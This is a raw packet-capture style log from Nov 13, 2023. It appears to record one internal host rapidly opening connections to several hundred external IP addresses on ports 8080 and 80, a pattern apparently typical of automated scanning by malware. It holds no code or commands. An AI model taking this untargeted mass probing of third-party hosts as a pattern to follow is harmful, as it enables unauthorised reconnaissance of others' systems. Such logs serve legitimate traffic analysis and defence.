                                                              Nov 13, 2023 22:17:57.727605104 CET139488080192.168.2.2331.56.0.165
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2395.197.228.219
                                                              Nov 13, 2023 22:17:57.727605104 CET139488080192.168.2.2362.174.110.109
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2394.167.95.111
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2395.244.25.180
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2362.178.99.242
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2395.242.139.145
                                                              Nov 13, 2023 22:17:57.727603912 CET139488080192.168.2.2395.85.73.155
                                                              Nov 13, 2023 22:17:57.727612019 CET139488080192.168.2.2395.17.59.222
                                                              Nov 13, 2023 22:17:57.727612019 CET139488080192.168.2.2331.122.8.72
                                                              Nov 13, 2023 22:17:57.727619886 CET139488080192.168.2.2394.195.243.64
                                                              Nov 13, 2023 22:17:57.727619886 CET139488080192.168.2.2385.0.72.66
                                                              Nov 13, 2023 22:17:57.727619886 CET139488080192.168.2.2385.75.160.64
                                                              Nov 13, 2023 22:17:57.727619886 CET139488080192.168.2.2385.117.226.234
                                                              Nov 13, 2023 22:17:57.727628946 CET139488080192.168.2.2385.235.72.152
                                                              Nov 13, 2023 22:17:57.727628946 CET139488080192.168.2.2331.44.255.88
                                                              Nov 13, 2023 22:17:57.727628946 CET139488080192.168.2.2331.124.126.224
                                                              Nov 13, 2023 22:17:57.727628946 CET139488080192.168.2.2395.235.185.121
                                                              Nov 13, 2023 22:17:57.727632046 CET139488080192.168.2.2395.73.79.13
                                                              Nov 13, 2023 22:17:57.727632046 CET139488080192.168.2.2395.95.112.208
                                                              Nov 13, 2023 22:17:57.727632046 CET139488080192.168.2.2395.117.39.80
                                                              Nov 13, 2023 22:17:57.727632046 CET139488080192.168.2.2385.32.203.174
                                                              Nov 13, 2023 22:17:57.727632046 CET139488080192.168.2.2394.3.190.226
                                                              Nov 13, 2023 22:17:57.727632999 CET139488080192.168.2.2395.59.150.166
                                                              Nov 13, 2023 22:17:57.727632999 CET139488080192.168.2.2395.247.76.151
                                                              Nov 13, 2023 22:17:57.727632999 CET139488080192.168.2.2395.7.28.174
                                                              Nov 13, 2023 22:17:57.727632999 CET1343680192.168.2.23112.123.31.4
                                                              Nov 13, 2023 22:17:57.727632999 CET139488080192.168.2.2395.223.174.119
                                                              Nov 13, 2023 22:17:57.727637053 CET1343680192.168.2.23112.245.145.42
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2362.21.101.205
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2394.28.192.222
                                                              Nov 13, 2023 22:17:57.727637053 CET1343680192.168.2.23112.62.138.50
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2331.66.156.142
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2331.185.9.117
                                                              Nov 13, 2023 22:17:57.727642059 CET139488080192.168.2.2385.5.31.192
                                                              Nov 13, 2023 22:17:57.727642059 CET139488080192.168.2.2362.27.63.112
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2394.8.93.120
                                                              Nov 13, 2023 22:17:57.727637053 CET139488080192.168.2.2385.160.45.51
                                                              Nov 13, 2023 22:17:57.727647066 CET139488080192.168.2.2395.234.249.5
                                                              Nov 13, 2023 22:17:57.727647066 CET139488080192.168.2.2395.110.44.224
                                                              Nov 13, 2023 22:17:57.727647066 CET139488080192.168.2.2331.248.61.92
                                                              Nov 13, 2023 22:17:57.727653027 CET139488080192.168.2.2394.101.83.226
                                                              Nov 13, 2023 22:17:57.727653027 CET139488080192.168.2.2394.77.107.185
                                                              Nov 13, 2023 22:17:57.727653980 CET139488080192.168.2.2394.203.231.28
                                                              Nov 13, 2023 22:17:57.727670908 CET1343680192.168.2.23112.15.8.80
                                                              Nov 13, 2023 22:17:57.727672100 CET139488080192.168.2.2394.176.246.191
                                                              Nov 13, 2023 22:17:57.727683067 CET139488080192.168.2.2362.167.159.158
                                                              Nov 13, 2023 22:17:57.727684021 CET139488080192.168.2.2385.163.72.2
                                                              Nov 13, 2023 22:17:57.727693081 CET139488080192.168.2.2395.192.180.74
                                                              Nov 13, 2023 22:17:57.727700949 CET139488080192.168.2.2385.120.55.168
                                                              Nov 13, 2023 22:17:57.727700949 CET139488080192.168.2.2385.123.97.166
                                                              Nov 13, 2023 22:17:57.727705002 CET139488080192.168.2.2385.147.85.63
                                                              Nov 13, 2023 22:17:57.727705002 CET139488080192.168.2.2331.200.8.39
                                                              Nov 13, 2023 22:17:57.727705002 CET139488080192.168.2.2331.40.70.165
                                                              Nov 13, 2023 22:17:57.727705002 CET139488080192.168.2.2394.0.9.196
                                                              Nov 13, 2023 22:17:57.727705002 CET139488080192.168.2.2331.181.79.225
                                                              Nov 13, 2023 22:17:57.727706909 CET139488080192.168.2.2395.160.6.195
                                                              Nov 13, 2023 22:17:57.727711916 CET1343680192.168.2.23112.53.48.23
                                                              Nov 13, 2023 22:17:57.727720022 CET1343680192.168.2.23112.82.55.17
                                                              Nov 13, 2023 22:17:57.727720022 CET139488080192.168.2.2395.137.190.98
                                                              Nov 13, 2023 22:17:57.727722883 CET139488080192.168.2.2385.41.166.132
                                                              Nov 13, 2023 22:17:57.727722883 CET139488080192.168.2.2385.14.93.49
                                                              Nov 13, 2023 22:17:57.727722883 CET139488080192.168.2.2362.187.224.104
                                                              Nov 13, 2023 22:17:57.727730989 CET139488080192.168.2.2385.59.90.247
                                                              Nov 13, 2023 22:17:57.727737904 CET139488080192.168.2.2395.98.66.53
                                                              Nov 13, 2023 22:17:57.727741957 CET139488080192.168.2.2394.183.199.15
                                                              Nov 13, 2023 22:17:57.727744102 CET1343680192.168.2.23112.131.123.11
                                                              Nov 13, 2023 22:17:57.727746010 CET139488080192.168.2.2331.124.162.192
                                                              Nov 13, 2023 22:17:57.727752924 CET1343680192.168.2.23112.64.233.196
                                                              Nov 13, 2023 22:17:57.727752924 CET139488080192.168.2.2331.85.156.69
                                                              Nov 13, 2023 22:17:57.727752924 CET139488080192.168.2.2385.160.70.79
                                                              Nov 13, 2023 22:17:57.727752924 CET139488080192.168.2.2362.12.168.18
                                                              Nov 13, 2023 22:17:57.727757931 CET1343680192.168.2.23112.219.250.187
                                                              Nov 13, 2023 22:17:57.727758884 CET139488080192.168.2.2362.50.248.138
                                                              Nov 13, 2023 22:17:57.727758884 CET139488080192.168.2.2394.84.92.244
                                                              Nov 13, 2023 22:17:57.727760077 CET139488080192.168.2.2394.21.112.140
                                                              Nov 13, 2023 22:17:57.727771044 CET139488080192.168.2.2362.197.60.105
                                                              Nov 13, 2023 22:17:57.727777958 CET139488080192.168.2.2394.17.61.129
                                                              Nov 13, 2023 22:17:57.727787018 CET139488080192.168.2.2395.86.2.233
                                                              Nov 13, 2023 22:17:57.727788925 CET139488080192.168.2.2362.32.221.181
                                                              Nov 13, 2023 22:17:57.727788925 CET1343680192.168.2.23112.72.227.81
                                                              Nov 13, 2023 22:17:57.727807999 CET139488080192.168.2.2362.166.68.114
                                                              Nov 13, 2023 22:17:57.727822065 CET139488080192.168.2.2385.37.189.219
                                                              Nov 13, 2023 22:17:57.727823973 CET139488080192.168.2.2362.214.112.3
                                                              Nov 13, 2023 22:17:57.727824926 CET139488080192.168.2.2394.155.228.155
                                                              Nov 13, 2023 22:17:57.727826118 CET139488080192.168.2.2331.100.243.89
                                                              Nov 13, 2023 22:17:57.727824926 CET139488080192.168.2.2394.135.198.221
                                                              Nov 13, 2023 22:17:57.727828979 CET139488080192.168.2.2394.133.217.212
                                                              Nov 13, 2023 22:17:57.727837086 CET1343680192.168.2.23112.179.49.159
                                                              Nov 13, 2023 22:17:57.727840900 CET139488080192.168.2.2395.98.97.144
                                                              Nov 13, 2023 22:17:57.727849960 CET1343680192.168.2.23112.251.50.155
                                                              Nov 13, 2023 22:17:57.727854967 CET139488080192.168.2.2362.253.183.221
                                                              Nov 13, 2023 22:17:57.727854967 CET139488080192.168.2.2395.240.52.109
                                                              Nov 13, 2023 22:17:57.727859020 CET139488080192.168.2.2331.25.47.107
                                                              Nov 13, 2023 22:17:57.727869987 CET139488080192.168.2.2331.190.54.91
                                                              Nov 13, 2023 22:17:57.727870941 CET139488080192.168.2.2385.242.220.246
                                                              Nov 13, 2023 22:17:57.727881908 CET139488080192.168.2.2331.182.249.0
                                                              Nov 13, 2023 22:17:57.727881908 CET139488080192.168.2.2385.178.173.235
                                                              Nov 13, 2023 22:17:57.727893114 CET139488080192.168.2.2394.17.109.194
                                                              Nov 13, 2023 22:17:57.727896929 CET1343680192.168.2.23112.68.240.217
                                                              Nov 13, 2023 22:17:57.727902889 CET139488080192.168.2.2362.168.149.51
                                                              Nov 13, 2023 22:17:57.727904081 CET139488080192.168.2.2331.108.9.197
                                                              Nov 13, 2023 22:17:57.727906942 CET139488080192.168.2.2385.0.96.185
                                                              Nov 13, 2023 22:17:57.727906942 CET139488080192.168.2.2385.117.171.60
                                                              Nov 13, 2023 22:17:57.727920055 CET139488080192.168.2.2394.198.170.255
                                                              Nov 13, 2023 22:17:57.727993965 CET139488080192.168.2.2395.176.178.88
                                                              Nov 13, 2023 22:17:57.727994919 CET1343680192.168.2.23112.69.225.149
                                                              Nov 13, 2023 22:17:57.727994919 CET139488080192.168.2.2362.135.20.239
                                                              Nov 13, 2023 22:17:57.727997065 CET139488080192.168.2.2395.177.153.106
                                                              Nov 13, 2023 22:17:57.727997065 CET139488080192.168.2.2394.174.222.172
                                                              Nov 13, 2023 22:17:57.727998018 CET139488080192.168.2.2395.108.70.189
                                                              Nov 13, 2023 22:17:57.727998018 CET139488080192.168.2.2385.14.43.160
                                                              Nov 13, 2023 22:17:57.728003025 CET139488080192.168.2.2394.142.149.108
                                                              Nov 13, 2023 22:17:57.728017092 CET139488080192.168.2.2395.63.191.131
                                                              Nov 13, 2023 22:17:57.728018999 CET1343680192.168.2.23112.26.38.186
                                                              Nov 13, 2023 22:17:57.728030920 CET139488080192.168.2.2385.53.42.83
                                                              Nov 13, 2023 22:17:57.728030920 CET1343680192.168.2.23112.63.19.212
                                                              Nov 13, 2023 22:17:57.728030920 CET139488080192.168.2.2362.82.184.135
                                                              Nov 13, 2023 22:17:57.728034019 CET1343680192.168.2.23112.199.223.105
                                                              Nov 13, 2023 22:17:57.728034019 CET139488080192.168.2.2362.9.249.221
                                                              Nov 13, 2023 22:17:57.728034019 CET139488080192.168.2.2362.18.133.222
                                                              Nov 13, 2023 22:17:57.728034019 CET1343680192.168.2.23112.128.125.188
                                                              Nov 13, 2023 22:17:57.728034019 CET139488080192.168.2.2385.145.249.89
                                                              Nov 13, 2023 22:17:57.728050947 CET139488080192.168.2.2385.171.76.237
                                                              Nov 13, 2023 22:17:57.728058100 CET139488080192.168.2.2395.25.169.234
                                                              Nov 13, 2023 22:17:57.728060007 CET139488080192.168.2.2362.156.105.193
                                                              Nov 13, 2023 22:17:57.728065014 CET139488080192.168.2.2395.50.246.216
                                                              Nov 13, 2023 22:17:57.728068113 CET1343680192.168.2.23112.110.216.211
                                                              Nov 13, 2023 22:17:57.728068113 CET139488080192.168.2.2395.12.110.41
                                                              Nov 13, 2023 22:17:57.728069067 CET139488080192.168.2.2394.137.140.153
                                                              Nov 13, 2023 22:17:57.728071928 CET139488080192.168.2.2394.199.165.199
                                                              Nov 13, 2023 22:17:57.728077888 CET139488080192.168.2.2362.237.24.101
                                                              Nov 13, 2023 22:17:57.728081942 CET139488080192.168.2.2362.134.32.182
                                                              Nov 13, 2023 22:17:57.728082895 CET139488080192.168.2.2385.103.90.137
                                                              Nov 13, 2023 22:17:57.728100061 CET139488080192.168.2.2394.142.44.240
                                                              Nov 13, 2023 22:17:57.728100061 CET139488080192.168.2.2394.238.76.197
                                                              Nov 13, 2023 22:17:57.728106976 CET139488080192.168.2.2385.188.254.69
                                                              Nov 13, 2023 22:17:57.728108883 CET139488080192.168.2.2362.96.232.214
                                                              Nov 13, 2023 22:17:57.728113890 CET139488080192.168.2.2331.166.102.207
                                                              Nov 13, 2023 22:17:57.728121042 CET1343680192.168.2.23112.87.101.37
                                                              Nov 13, 2023 22:17:57.728121996 CET1343680192.168.2.23112.178.204.224
                                                              Nov 13, 2023 22:17:57.728125095 CET139488080192.168.2.2362.201.236.48
                                                              Nov 13, 2023 22:17:57.728130102 CET139488080192.168.2.2394.77.28.154
                                                              Nov 13, 2023 22:17:57.728135109 CET139488080192.168.2.2362.225.150.25
                                                              Nov 13, 2023 22:17:57.728135109 CET139488080192.168.2.2331.158.254.114
                                                              Nov 13, 2023 22:17:57.728137970 CET139488080192.168.2.2385.117.68.20
                                                              Nov 13, 2023 22:17:57.728151083 CET139488080192.168.2.2331.53.83.181
                                                              Nov 13, 2023 22:17:57.728152037 CET139488080192.168.2.2395.245.37.181
                                                              Nov 13, 2023 22:17:57.728154898 CET139488080192.168.2.2331.29.188.252
                                                              Nov 13, 2023 22:17:57.728159904 CET1343680192.168.2.23112.162.244.115
                                                              Nov 13, 2023 22:17:57.728168964 CET139488080192.168.2.2395.47.179.168
                                                              Nov 13, 2023 22:17:57.728171110 CET139488080192.168.2.2331.237.228.142
                                                              Nov 13, 2023 22:17:57.728177071 CET139488080192.168.2.2385.195.148.18
                                                              Nov 13, 2023 22:17:57.728189945 CET139488080192.168.2.2385.238.50.170
                                                              Nov 13, 2023 22:17:57.728194952 CET139488080192.168.2.2362.67.124.200
                                                              Nov 13, 2023 22:17:57.728205919 CET1343680192.168.2.23112.149.165.186
                                                              Nov 13, 2023 22:17:57.728208065 CET139488080192.168.2.2394.218.246.75
                                                              Nov 13, 2023 22:17:57.728208065 CET139488080192.168.2.2331.157.138.93
                                                              Nov 13, 2023 22:17:57.728213072 CET139488080192.168.2.2362.119.124.231
                                                              Nov 13, 2023 22:17:57.728218079 CET139488080192.168.2.2395.148.185.154
                                                              Nov 13, 2023 22:17:57.728225946 CET1343680192.168.2.23112.142.255.214
                                                              Nov 13, 2023 22:17:57.728226900 CET139488080192.168.2.2331.230.208.153
                                                              Nov 13, 2023 22:17:57.728231907 CET139488080192.168.2.2331.187.36.136
                                                              Nov 13, 2023 22:17:57.728231907 CET139488080192.168.2.2362.254.150.207
                                                              Nov 13, 2023 22:17:57.728231907 CET139488080192.168.2.2362.91.212.138
                                                              Nov 13, 2023 22:17:57.728235006 CET139488080192.168.2.2394.178.149.1
                                                              Nov 13, 2023 22:17:57.728241920 CET139488080192.168.2.2385.90.51.227
                                                              Nov 13, 2023 22:17:57.728274107 CET139488080192.168.2.2385.59.21.152
                                                              Nov 13, 2023 22:17:57.728281975 CET139488080192.168.2.2394.224.98.43
                                                              Nov 13, 2023 22:17:57.728282928 CET1343680192.168.2.23112.143.248.42
                                                              Nov 13, 2023 22:17:57.728286028 CET139488080192.168.2.2362.154.194.2
                                                              Nov 13, 2023 22:17:57.728286028 CET139488080192.168.2.2331.126.98.201
                                                              Nov 13, 2023 22:17:57.728286028 CET139488080192.168.2.2394.250.52.191
                                                              Nov 13, 2023 22:17:57.728297949 CET139488080192.168.2.2385.186.143.193
                                                              Nov 13, 2023 22:17:57.728297949 CET139488080192.168.2.2385.234.8.142
                                                              Nov 13, 2023 22:17:57.728297949 CET139488080192.168.2.2395.242.52.54
                                                              Nov 13, 2023 22:17:57.728322983 CET139488080192.168.2.2385.111.49.229
                                                              Nov 13, 2023 22:17:57.728322983 CET139488080192.168.2.2331.206.140.193
                                                              Nov 13, 2023 22:17:57.728323936 CET139488080192.168.2.2395.184.101.130
                                                              Nov 13, 2023 22:17:57.728323936 CET139488080192.168.2.2385.138.121.171
                                                              Nov 13, 2023 22:17:57.728327990 CET139488080192.168.2.2394.81.209.218
                                                              Nov 13, 2023 22:17:57.728327990 CET1343680192.168.2.23112.6.123.115
                                                              Nov 13, 2023 22:17:57.728331089 CET139488080192.168.2.2362.164.201.118
                                                              Nov 13, 2023 22:17:57.728331089 CET139488080192.168.2.2331.106.215.128
                                                              Nov 13, 2023 22:17:57.728331089 CET139488080192.168.2.2385.128.205.217
                                                              Nov 13, 2023 22:17:57.728338003 CET139488080192.168.2.2385.120.133.245
                                                              Nov 13, 2023 22:17:57.728341103 CET139488080192.168.2.2362.126.58.154
                                                              Nov 13, 2023 22:17:57.728341103 CET1343680192.168.2.23112.107.16.130
                                                              Nov 13, 2023 22:17:57.728341103 CET139488080192.168.2.2362.221.196.82
                                                              Nov 13, 2023 22:17:57.728343964 CET139488080192.168.2.2331.59.136.126
                                                              Nov 13, 2023 22:17:57.728343964 CET139488080192.168.2.2331.72.8.56
                                                              Nov 13, 2023 22:17:57.728343964 CET139488080192.168.2.2395.4.6.217
                                                              Nov 13, 2023 22:17:57.728343964 CET139488080192.168.2.2385.46.216.37
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2394.46.140.249
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2394.16.222.192
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2331.102.82.135
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2385.223.198.198
                                                              Nov 13, 2023 22:17:57.728348017 CET139488080192.168.2.2385.234.57.1
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2395.228.166.118
                                                              Nov 13, 2023 22:17:57.728348017 CET139488080192.168.2.2331.182.1.188
                                                              Nov 13, 2023 22:17:57.728348970 CET139488080192.168.2.2331.31.216.176
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2385.30.120.0
                                                              Nov 13, 2023 22:17:57.728344917 CET1343680192.168.2.23112.157.82.18
                                                              Nov 13, 2023 22:17:57.728348970 CET1343680192.168.2.23112.58.93.35
                                                              Nov 13, 2023 22:17:57.728348017 CET139488080192.168.2.2394.0.147.71
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2395.195.242.88
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2394.22.136.174
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2394.188.81.135
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2362.104.230.46
                                                              Nov 13, 2023 22:17:57.728344917 CET139488080192.168.2.2394.110.32.40
                                                              Nov 13, 2023 22:17:57.728359938 CET139488080192.168.2.2394.43.110.254
                                                              Nov 13, 2023 22:17:57.728359938 CET139488080192.168.2.2394.21.114.142
                                                              Nov 13, 2023 22:17:57.728359938 CET139488080192.168.2.2385.153.67.99
                                                              Nov 13, 2023 22:17:57.728359938 CET139488080192.168.2.2394.32.173.4
                                                              Nov 13, 2023 22:17:57.728363991 CET139488080192.168.2.2395.192.222.8
                                                              Nov 13, 2023 22:17:57.728363991 CET139488080192.168.2.2362.229.175.156
                                                              Nov 13, 2023 22:17:57.728363991 CET139488080192.168.2.2385.37.238.219
                                                              Nov 13, 2023 22:17:57.728365898 CET139488080192.168.2.2394.152.125.227
                                                              Nov 13, 2023 22:17:57.728365898 CET139488080192.168.2.2331.13.47.22
                                                              Nov 13, 2023 22:17:57.728365898 CET139488080192.168.2.2385.227.230.205
                                                              Nov 13, 2023 22:17:57.728365898 CET139488080192.168.2.2394.22.58.195
                                                              Nov 13, 2023 22:17:57.728378057 CET139488080192.168.2.2385.54.40.56
                                                              Nov 13, 2023 22:17:57.728389025 CET1343680192.168.2.23112.230.190.119
                                                              Nov 13, 2023 22:17:57.728389025 CET1343680192.168.2.23112.179.112.5
                                                              Nov 13, 2023 22:17:57.728389025 CET139488080192.168.2.2394.136.46.109
                                                              Nov 13, 2023 22:17:57.728389025 CET139488080192.168.2.2394.162.99.228
                                                              Nov 13, 2023 22:17:57.728389025 CET139488080192.168.2.2331.132.240.232
                                                              Nov 13, 2023 22:17:57.728389025 CET139488080192.168.2.2385.16.74.208
                                                              Nov 13, 2023 22:17:57.728389025 CET139488080192.168.2.2395.48.130.97
                                                              Nov 13, 2023 22:17:57.728394985 CET139488080192.168.2.2362.117.119.106
                                                              Nov 13, 2023 22:17:57.728394985 CET139488080192.168.2.2331.21.128.133
                                                              Nov 13, 2023 22:17:57.728411913 CET139488080192.168.2.2385.78.115.190
                                                              Nov 13, 2023 22:17:57.728411913 CET139488080192.168.2.2362.9.215.175
                                                              Nov 13, 2023 22:17:57.728414059 CET139488080192.168.2.2395.77.236.60
                                                              Nov 13, 2023 22:17:57.728415012 CET139488080192.168.2.2385.15.127.108
                                                              Nov 13, 2023 22:17:57.728416920 CET1343680192.168.2.23112.241.182.57
                                                              Nov 13, 2023 22:17:57.728429079 CET139488080192.168.2.2362.255.104.169
                                                              Nov 13, 2023 22:17:57.728444099 CET1343680192.168.2.23112.169.115.248
                                                              Nov 13, 2023 22:17:57.728444099 CET139488080192.168.2.2385.211.248.65
                                                              Nov 13, 2023 22:17:57.728445053 CET139488080192.168.2.2385.172.221.203
                                                              Nov 13, 2023 22:17:57.728444099 CET139488080192.168.2.2362.161.154.66
                                                              Nov 13, 2023 22:17:57.728466034 CET139488080192.168.2.2385.90.109.254
                                                              Nov 13, 2023 22:17:57.728466034 CET139488080192.168.2.2331.248.109.206
                                                              Nov 13, 2023 22:17:57.728467941 CET139488080192.168.2.2362.231.223.118
                                                              Nov 13, 2023 22:17:57.728470087 CET1343680192.168.2.23112.72.174.194
                                                              Nov 13, 2023 22:17:57.728471041 CET139488080192.168.2.2331.67.226.97
                                                              Nov 13, 2023 22:17:57.728471041 CET139488080192.168.2.2385.236.232.230
                                                              Nov 13, 2023 22:17:57.728471041 CET139488080192.168.2.2362.68.113.126
                                                              Nov 13, 2023 22:17:57.728476048 CET1343680192.168.2.23112.111.139.205
                                                              Nov 13, 2023 22:17:57.728477955 CET1343680192.168.2.23112.160.170.202
                                                              Nov 13, 2023 22:17:57.728478909 CET139488080192.168.2.2331.201.38.141
                                                              Nov 13, 2023 22:17:57.728487015 CET139488080192.168.2.2395.162.25.22
                                                              Nov 13, 2023 22:17:57.728498936 CET1343680192.168.2.23112.219.151.118
                                                              Nov 13, 2023 22:17:57.728498936 CET139488080192.168.2.2395.219.78.2
                                                              Nov 13, 2023 22:17:57.728502035 CET139488080192.168.2.2362.41.234.190
                                                              Nov 13, 2023 22:17:57.728506088 CET139488080192.168.2.2395.127.87.242
                                                              Nov 13, 2023 22:17:57.728507996 CET139488080192.168.2.2395.102.250.63
                                                              Nov 13, 2023 22:17:57.728507996 CET139488080192.168.2.2385.18.42.185
                                                              Nov 13, 2023 22:17:57.728507996 CET139488080192.168.2.2331.198.244.179
                                                              Nov 13, 2023 22:17:57.728508949 CET139488080192.168.2.2395.38.138.64
                                                              Nov 13, 2023 22:17:57.728514910 CET139488080192.168.2.2395.35.62.164
                                                              Nov 13, 2023 22:17:57.728514910 CET139488080192.168.2.2395.213.158.231
                                                              Nov 13, 2023 22:17:57.728528023 CET139488080192.168.2.2395.8.108.161
                                                              Nov 13, 2023 22:17:57.728530884 CET139488080192.168.2.2395.240.56.35
                                                              Nov 13, 2023 22:17:57.728542089 CET139488080192.168.2.2395.115.25.101
                                                              Nov 13, 2023 22:17:57.728544950 CET1343680192.168.2.23112.45.247.195
                                                              Nov 13, 2023 22:17:57.728553057 CET139488080192.168.2.2395.199.250.115
                                                              Nov 13, 2023 22:17:57.728563070 CET139488080192.168.2.2395.141.5.219
                                                              Nov 13, 2023 22:17:57.728564978 CET139488080192.168.2.2394.212.168.237
                                                              Nov 13, 2023 22:17:57.728569031 CET139488080192.168.2.2385.62.127.178
                                                              Nov 13, 2023 22:17:57.728573084 CET139488080192.168.2.2331.207.181.110
                                                              Nov 13, 2023 22:17:57.728574038 CET1343680192.168.2.23112.162.88.132
                                                              Nov 13, 2023 22:17:57.728579044 CET139488080192.168.2.2395.246.52.81
                                                              Nov 13, 2023 22:17:57.728579998 CET139488080192.168.2.2362.46.17.66
                                                              Nov 13, 2023 22:17:57.728589058 CET139488080192.168.2.2385.214.165.237
                                                              Nov 13, 2023 22:17:57.728593111 CET139488080192.168.2.2394.232.77.83
                                                              Nov 13, 2023 22:17:57.728594065 CET139488080192.168.2.2362.100.118.252
                                                              Nov 13, 2023 22:17:57.728617907 CET139488080192.168.2.2395.215.211.143
                                                              Nov 13, 2023 22:17:57.728617907 CET139488080192.168.2.2331.192.81.201
                                                              Nov 13, 2023 22:17:57.728617907 CET139488080192.168.2.2385.40.79.120
                                                              Nov 13, 2023 22:17:57.728617907 CET1343680192.168.2.23112.180.7.13
                                                              Nov 13, 2023 22:17:57.728635073 CET139488080192.168.2.2394.110.197.230
                                                              Nov 13, 2023 22:17:57.728636026 CET139488080192.168.2.2395.179.180.43
                                                              Nov 13, 2023 22:17:57.728640079 CET139488080192.168.2.2395.202.254.202
                                                              Nov 13, 2023 22:17:57.728641987 CET139488080192.168.2.2395.224.104.160
                                                              Nov 13, 2023 22:17:57.728648901 CET139488080192.168.2.2331.223.188.10
                                                              Nov 13, 2023 22:17:57.728653908 CET1343680192.168.2.23112.202.4.41
                                                              Nov 13, 2023 22:17:57.728665113 CET139488080192.168.2.2395.194.245.252
                                                              Nov 13, 2023 22:17:57.728669882 CET139488080192.168.2.2331.233.83.142
                                                              Nov 13, 2023 22:17:57.728676081 CET1343680192.168.2.23112.207.155.28
                                                              Nov 13, 2023 22:17:57.728745937 CET139488080192.168.2.2394.204.177.106
                                                              Nov 13, 2023 22:17:57.728782892 CET139488080192.168.2.2394.236.254.144
                                                              Nov 13, 2023 22:17:57.728782892 CET139488080192.168.2.2385.126.15.205
                                                              Nov 13, 2023 22:17:57.728782892 CET139488080192.168.2.2385.116.234.16
                                                              Nov 13, 2023 22:17:57.728784084 CET139488080192.168.2.2395.187.125.190
                                                              Nov 13, 2023 22:17:57.728784084 CET139488080192.168.2.2331.194.227.168
                                                              Nov 13, 2023 22:17:57.728784084 CET139488080192.168.2.2394.76.74.126
                                                              Nov 13, 2023 22:17:57.728785992 CET139488080192.168.2.2362.120.153.126
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2394.41.139.99
                                                              Nov 13, 2023 22:17:57.728784084 CET139488080192.168.2.2385.215.204.244
                                                              Nov 13, 2023 22:17:57.728785992 CET139488080192.168.2.2385.153.112.197
                                                              Nov 13, 2023 22:17:57.728787899 CET139488080192.168.2.2395.225.33.37
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2385.198.38.30
                                                              Nov 13, 2023 22:17:57.728787899 CET139488080192.168.2.2331.161.4.66
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2385.254.197.35
                                                              Nov 13, 2023 22:17:57.728792906 CET139488080192.168.2.2395.242.67.194
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2385.2.76.66
                                                              Nov 13, 2023 22:17:57.728792906 CET139488080192.168.2.2385.213.174.38
                                                              Nov 13, 2023 22:17:57.728791952 CET139488080192.168.2.2331.44.89.154
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2394.226.148.223
                                                              Nov 13, 2023 22:17:57.728797913 CET139488080192.168.2.2362.131.74.142
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2395.43.169.11
                                                              Nov 13, 2023 22:17:57.728797913 CET139488080192.168.2.2331.247.245.120
                                                              Nov 13, 2023 22:17:57.728792906 CET139488080192.168.2.2362.151.159.70
                                                              Nov 13, 2023 22:17:57.728786945 CET139488080192.168.2.2362.211.99.205
                                                              Nov 13, 2023 22:17:57.728792906 CET139488080192.168.2.2362.80.56.151
                                                              Nov 13, 2023 22:17:57.728799105 CET139488080192.168.2.2331.76.200.197
                                                              Nov 13, 2023 22:17:57.728792906 CET139488080192.168.2.2385.121.100.148
                                                              Nov 13, 2023 22:17:57.728791952 CET139488080192.168.2.2394.69.2.55
                                                              Nov 13, 2023 22:17:57.728791952 CET139488080192.168.2.2394.82.173.137
                                                              Nov 13, 2023 22:17:57.728787899 CET139488080192.168.2.2331.0.221.129
                                                              Nov 13, 2023 22:17:57.728791952 CET139488080192.168.2.2362.30.100.64
                                                              Nov 13, 2023 22:17:57.728787899 CET139488080192.168.2.2395.39.47.5
                                                              Nov 13, 2023 22:17:57.728787899 CET139488080192.168.2.2395.3.114.149
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2331.71.191.47
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2331.58.93.177
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2395.97.8.225
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2385.65.193.17
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2385.169.34.17
                                                              Nov 13, 2023 22:17:57.728813887 CET139488080192.168.2.2362.79.12.82
                                                              Nov 13, 2023 22:17:57.728818893 CET139488080192.168.2.2395.169.37.125
                                                              Nov 13, 2023 22:17:57.728818893 CET139488080192.168.2.2385.145.109.223
                                                              Nov 13, 2023 22:17:57.728818893 CET139488080192.168.2.2385.60.192.182
                                                              Nov 13, 2023 22:17:57.728818893 CET139488080192.168.2.2395.157.105.148
                                                              Nov 13, 2023 22:17:57.728818893 CET139488080192.168.2.2395.199.125.202
                                                              Nov 13, 2023 22:17:57.728820086 CET139488080192.168.2.2331.239.175.180
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2385.12.133.44
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2331.234.242.163
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2331.146.227.194
                                                              Nov 13, 2023 22:17:57.728836060 CET139488080192.168.2.2385.188.66.49
